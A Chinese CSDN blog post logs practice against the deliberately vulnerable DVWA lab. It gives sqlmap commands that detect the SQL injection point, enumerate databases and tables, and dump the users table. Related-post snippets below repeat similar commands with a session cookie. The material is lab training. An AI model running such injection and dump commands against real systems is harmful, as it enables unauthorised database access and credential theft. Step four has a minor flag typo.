DVWA练习记录--使用sqlmap实现SQL注入

最新推荐文章于 2024-06-26 01:09:19 发布
最新推荐文章于 2024-06-26 01:09:19 发布
阅读量265 收藏 2
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63095349/article/details/132699946
版权

准备:

1.sqlmap官网下载(这里我用的是kali自带的sqlmap)

2.DVWA靶场搭建(教程很多可以自己去搜)

一:检测注入点是否存在

sqlmap -u "http://IP/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="COOKIE"  

        sqlmap中,-u后面跟检测网址,--cookie后接当前会话的cookies

        1.IP:

        IP是DVWA所在虚拟机上的IP,默认127.0.0.1,如果不是在同一个虚拟机上使用sqlmap进行检测,则需要先得到DVWA所在虚拟机上的IP。

        2.COOKIE:

        cookies值获取过程如下:

                a.按F12键后点到网络一栏,点击重新加载。

                b.重新加载后单击第一行。

                c.右边得到请求头一栏的cookies。

        输入命令,检测到漏洞。

二:获取数据库名

只需在原来命令后加上 --dbs

sqlmap -u "http://IP/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="COOKIE" --dbs

dbs指database server,获取所有数据库名。

三:获取数据库表

只需在最初命令后加上 -D dvwa --tables

sqlmap -u "http://IP/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="COOKIE" -D dvwa --tables

1.-D后跟指定的数据库,这里是dvwa

2.--tables列出数据库表

得到dvwa数据库下的两个表:

四:读取数据库表

只需在最初命令后加上 -D dvwa --tables

sqlmap -u "http://IP/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="COOKIE" -D dvwa -T users--dump

1.-T后跟指定的表名,这里是users

2.--dump读取数据

一路回车得到数据库内容

附:参考视频

KID.Sink
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA-SQL注入sqlmap安装和使用
m0_64037702的博客
07-12 1089
链接:https://pan.baidu.com/s/1-kQgGgzwAJlIbA6hPbvv9Q 提取码:8eqw 双击安装包进行安装 新建一个文件夹选择安装至这个文件夹 我的电脑找到 属性 点击高级系统设置 出现 “系统属性" , 点击环境变量 出现“环境变量” 在下面的“系统变量”里面找到 Path 变量点击编辑(没有找到的话点击新建) 在变量值那里末尾,填上你的Python安装路径 在path中添加自己python的安装路径就行了 Win+R打开cmd输入python出现这个页面表示安装成功
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类型的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
sqlmap快速上手教程
weixin_34138377的博客
10-31 308
为什么80%的码农都做不了架构师?>>> ...
sqlmap命令学习及测试dvwa_SQL_Injection】
最新发布
qq_58553228的博客
06-26 442
内容有常见的sqlmap的options,至于script暂未学习到。
sqlmapdvwa进行sql注入
weixin_52971422的博客
04-01 4757
渗透环境:dvwa 攻击机:kali 注入点 测试 在kali使用sqlmap,添加cooki来注入 sqlmap -u "http://192.168.17.152/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=24d706127dc1260818eadf1641c43547" --dbs 成功 继续查询数据库的表 sqlmap -u "http://1
使用SQLMAP学习DVWA-SQL Injection(SQL注入
weixin_43838889的博客
04-28 558
SQLMAP 是知名的自动化SQL注入和数据库工具,需要Python环境运行。 本文参考SQLMAP详解 向博主致谢 浏览器F12进入开发者调试界面,将Request Headers部分全部复制保存成dvwa_sqli_low.txt文件。 ##Low 执行sqlmap.py -r dvwa_sqli_low.txt, -r REQUESTFILE Load HTTP request from a file 从文件加载HTTP请求 D:
漏洞防范:搭建漏洞靶场DVWA,DVWASQL注入漏洞,利用sqlmap把复杂的程序自动化
weixin_52371314的博客
10-12 1913
sql注入漏洞
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
2020-12-06-DVWA之sql.md
01-24
本文详细介绍了在DVWA环境下如何利用SQL注入漏洞进行攻击的具体步骤。通过这些步骤,我们不仅能够了解到SQL注入的基本原理,还能够掌握如何利用这一漏洞进行数据的获取。同时,通过对中等难度级别的SQL注入的分析,...
使用sqlmap+burpsuite进行中级sql注入
06-01
在本例中,我们使用DVWA(Damn Vulnerable Web Application)作为靶场,其SQL Injection模块为我们提供了一个理想的注入点。访问DVWA并尝试提交可能导致SQL注入的参数,如`sql-injection`页面的`id`参数。 3. **...
DVWA练习平台
04-24
是一个用来进行安全脆弱性鉴定的 PHP /MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
DVWA——SQL注入——sqlmap实现
weixin_46709219的博客
11-14 1318
网络安全-sqlmap学习笔记 sqlmap上面的总连接
DVWA——使用sqlmap工具post注入
@一只躺平的猪@的博客
07-09 4163
使用phpstudy搭建的DVWA靶场-暴力破解(low级别) sqlmap 可以看到密码解密为root 也可以用在线的md5对密文进行解密 https://www.cmd5.com/ 本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。
SQLMAP注入DVWA实战
m0_62636343的博客
05-12 2210
SQLMAP注入DVWA
Sqlmap
mumuzi2的博客
02-25 389
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
自学渗透测试:使用 DVWASQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2594
SQL注入漏洞
sqlmap自动化漏洞利用(DVWA初、中、高)
qq_42620328的博客
10-14 7153
sqlmap自动化漏洞利用(DVWA
DVWA靶场练习
农夫果园好好喝的博客
05-18 1235
1 SQL 注入 1.1 SQL注入介绍 SQL injection,即SQL注入,攻击者在 WEB 表单或者页面请求的查询字符串中通过注入恶意的 SQL 命令,从而使数据库执行恶意的 SQL 语句 1.2 漏洞出现的场景 此漏洞通常出现在如下场景: WEB表单提交 域名 1.3 注入思路 1.判断是否存在注入,注入类型是字符型、数字型还是搜索性型。 2.猜解 SQL 查询语句中的字段数。 3.确定显示的字段顺序。 4.获取当前的数据库。 5.获取当前数据库中的表 6.获取表中的字段名。 7.查询数据 gr
使用SQLmap检测SQL注入DVWA实战教程
“通过sqlnamp检测sql注入漏洞的随堂笔记,包括安装SQLmapDVWA,以及SQL注入的概述和SQLmap的介绍。” 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过在Web应用的输入字段中插入恶意SQL代码,来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值